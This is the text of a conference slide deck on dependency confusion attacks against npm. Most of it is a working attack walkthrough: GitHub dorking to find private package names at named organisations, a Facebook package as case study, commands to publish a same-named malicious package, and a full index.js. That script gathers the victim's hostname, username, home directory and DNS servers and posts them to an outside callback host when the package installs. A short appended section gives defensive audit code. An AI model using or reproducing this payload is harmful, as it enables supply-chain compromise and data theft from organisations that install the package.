Slide 1

WHOAMI?
Bug Bounty Hunter and Trainer
Red Team Ops @Agri10x
Masters in Cyber Security @UEA
Interested in WebApps, Functional Exploits and Bikes
Indian

Slide 2

Dependency Confusion

Slide 3

What is Dependency Confusion?

A Dependency Confusion attack, also known as a supply chain substitution attack, occurs when a software installer script is tricked into downloading a malicious code file from a public repository rather than the intended file of the same name from an internal repository.

Slide 4

(image only: comparison of the public and private package versions, no text extracted)

Slide 5

Difference?

1. As seen in the above image, the Public Package has a higher version than the Private Package.
2. As a result, if the package indexing is not completed properly, the higher-version package will automatically be retrieved from the Public Registry.

Slide 6

How to find Private Packages?

Within an organization, use GitHub dorking with keywords like:
  package.json org:Samsung
Use filters like language:json:
  org:Samsung package.json language:json
  org:target_org package.json language:json

Slide 7

(image only, no text extracted)

Slide 8

It can also be found using the npm package.json disclosure nuclei template.

Slide 9

Case Study

https://github.com/facebook/flipper/blob/45ce538c8dd6b448388a01e2ed4fa398956e5e20/desktop/eslint-plugin-flipper/package.json

1. wget https://github.com/facebook/flipper/blob/45ce538c8dd6b448388a01e2ed4fa398956e5e20/desktop/eslint-plugin-flipper/package.json
2. Package Name: eslint-plugin-flipper
3. Type: Private

Slide 10

We have to check whether the private package exists or not on the official website: https://www.npmjs.com/

Slide 11

Creating Malicious Packages (NPM)

Install NPM and create the package using the following commands:
1. apt install npm
2. npm login
3. npm init : Create package

Slide 12

After the package.json file has been created successfully, we need to edit the created file (index.js) to execute our own scripts and commands.

index.js:

const os = require("os");
const dns = require("dns");
const querystring = require("querystring");
const https = require("https");
const packageJSON = require("./package.json");
const package = packageJSON.name;

// Collect identifying information about the host the package is installed on.
const trackingData = JSON.stringify({
  p: package,
  c: __dirname,
  hd: os.homedir(),
  hn: os.hostname(),
  un: os.userInfo().username,
  dns: dns.getServers(),
  r: packageJSON ? packageJSON.___resolved : undefined,
  v: packageJSON.version,
  pjson: packageJSON,
});

var postData = querystring.stringify({
  msg: trackingData,
});

var options = {
  hostname: "burpcollaborator.net", // replace burpcollaborator.net with Interactsh or pipedream
  port: 443,
  path: "/",
  method: "POST",
  headers: {
    "Content-Type": "application/x-www-form-urlencoded",
    "Content-Length": postData.length,
  },
};

// Send the collected data to the callback host and echo any response.
var req = https.request(options, (res) => {
  res.on("data", (d) => {
    process.stdout.write(d);
  });
});

req.on("error", (e) => {
  // console.error(e);
});

req.write(postData);
req.end();

Slide 13

Pushing into Public Registry (NPM)

Now there will be two files created: package.json and index.js. Before publishing the package to the public registry, make sure this package name doesn't exist in the Public Registry. Use the following command to publish the package.

Slide 14

(image only, no text extracted)

Slide 15

The published package has a higher version than the original one.

Slide 16

packages, our package.json preinstall script will execute the index.js file and obtain the hostname, directory, IP address, and username as shown below.
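As an added defensive example (not part of the original slides), the audit below flags the two conditions the attack relies on: an internal package name that is unscoped, so the public registry can serve a same-named package, and a floating version range, so the higher public version wins. It also checks that every private scope is pinned to the internal registry in .npmrc. The package names, scopes and .npmrc contents are constructed.

```javascript
// Added example (not from the original slides): audit a package.json and .npmrc
// for dependency-confusion exposure. All names and file contents are constructed.

// Only an exact x.y.z version cannot be outbid by a higher public release.
function isPinned(range) {
  return /^\d+\.\d+\.\d+$/.test(String(range).trim());
}

// pkgJson: parsed package.json; privateNames: Set of names that exist only in
// the internal registry. Returns one entry per risky private dependency.
function findConfusionRisks(pkgJson, privateNames) {
  const risks = [];
  for (const section of ["dependencies", "devDependencies", "optionalDependencies"]) {
    for (const [name, range] of Object.entries(pkgJson[section] || {})) {
      if (!privateNames.has(name)) continue; // genuinely public dependency
      const reasons = [];
      if (!name.startsWith("@")) reasons.push("unscoped"); // public npm can serve this name
      if (!isPinned(range)) reasons.push("floating range"); // higher public version would win
      if (reasons.length > 0) risks.push({ section, name, range, reasons });
    }
  }
  return risks;
}

// Every private scope must be mapped to the internal registry in .npmrc,
// otherwise @scope/* names still resolve against the public registry.
function scopesMissingRegistry(npmrcText, privateScopes) {
  const mapped = new Set();
  for (const line of npmrcText.split(/\r?\n/)) {
    const m = line.trim().match(/^(@[^:]+):registry=(\S+)/);
    if (m) mapped.add(m[1]);
  }
  return privateScopes.filter((scope) => !mapped.has(scope));
}

// Constructed sample data standing in for an organization's internal package list.
const PRIVATE_NAMES = new Set(["internal-eslint-rules", "@acme/telemetry", "@acme/auth"]);
const SAMPLE_PACKAGE_JSON = {
  name: "acme-web",
  dependencies: { express: "^4.18.0", "internal-eslint-rules": "^1.2.0", "@acme/auth": "2.0.1" },
  devDependencies: { "@acme/telemetry": "^3.0.0" },
};
const SAMPLE_NPMRC = "registry=https://registry.npmjs.org/\n@acme:registry=https://npm.internal.example/\n";

if (typeof require !== "undefined" && require.main === module) {
  console.log(findConfusionRisks(SAMPLE_PACKAGE_JSON, PRIVATE_NAMES));
  console.log(scopesMissingRegistry(SAMPLE_NPMRC, ["@acme", "@acme-tools"]));
}
```

On the sample data, internal-eslint-rules is reported as both unscoped and floating, @acme/telemetry only as floating, and @acme-tools as a scope with no registry mapping.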

Slide 17

Thank you guys!
DAMNcon2021